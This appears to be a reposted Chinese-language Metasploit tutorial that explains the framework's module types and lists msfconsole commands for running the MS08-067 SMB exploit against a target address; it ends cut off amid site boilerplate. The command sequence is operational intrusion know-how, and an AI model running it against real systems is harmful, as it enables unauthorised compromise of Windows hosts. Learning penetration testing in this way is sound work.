詳盡的msf——meterpreter——滲透測試教程
前言
本文僅供學(xué)習(xí)參考使用,切勿用于非法事情??!
眾所周知,msf是大家公認(rèn)的神器,年少不知msf香,總想自己寫程序。
現(xiàn)在發(fā)現(xiàn)msf很厲害,可以在它的基礎(chǔ)上開發(fā)。
msf是框架,什么意思呢,用它可以做滲透攻擊的一整套流程,包括前期探索(發(fā)育),中期攻擊(開團(tuán)),后期控守(推塔)
我們可以在msfconsole上,開發(fā)自己的程序(用自己的英雄),程序可以利用msf中的模塊(用它的裝備)
msfconsole簡介
Metasploit是一款開源安全漏洞檢測工具,附帶數(shù)百個(gè)已知的軟件漏洞,并保持頻繁更新。被安全社區(qū)冠以“可以黑掉整個(gè)宇宙”之名的強(qiáng)大滲透測試框架。
五大模塊:
滲透攻擊(Exploit),指由攻擊者或滲透測試者利用一個(gè)系統(tǒng)、應(yīng)用或服務(wù)中的安全漏洞,所進(jìn)行的攻擊行為。
攻擊載荷(Payload),是我們期望目標(biāo)系統(tǒng)在被滲透攻擊之后去執(zhí)行的代碼。
Shellcode,是在滲透攻擊是作為攻擊載荷運(yùn)行的一組機(jī)器指令,通常用匯編語言編寫。
模塊(Module),指Metasploit框架中所使用的一段軟件代碼組件,可用于發(fā)起滲透攻擊或執(zhí)行某些輔助攻擊動(dòng)作。
監(jiān)聽器(Listener),是Metasploit中用來等待網(wǎng)絡(luò)連接的組件。
msfconsole使用方法——常用命令
直接使用并進(jìn)行一次攻擊
#初次使用:
service postgresql start # 啟動(dòng)數(shù)據(jù)庫服務(wù)
msfdb init # 初始化數(shù)據(jù)庫
#之后使用:
msfconsole # 啟動(dòng)metasploit
#查看幫助選項(xiàng)
help
#search - 查看漏洞:
search ms08_067
#use - 使用漏洞:
use exploit/windows/smb/ms08_067_netapi
#show - 查看可以攻擊的靶機(jī)操作系統(tǒng)型號(targets):
show targets
#set - 設(shè)置target 參數(shù)(xx是對應(yīng)被攻擊靶機(jī)的型號):
set target xx
#set - 設(shè)置rhost參數(shù)(攻擊靶機(jī)的ip地址):
set rhost 192.168.xxx.xxx
#show - 查看參數(shù):
show options
#進(jìn)行攻擊:
exploit
具體參數(shù)可以查看幫助選項(xiàng)
help文章來源:http://www.zghlxwxcb.cn/news/detail-414634.html
文章來源地址http://www.zghlxwxcb.cn/news/detail-414634.html
msfcon
到了這里,關(guān)于詳盡的msf——meterpreter——滲透測試教程的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!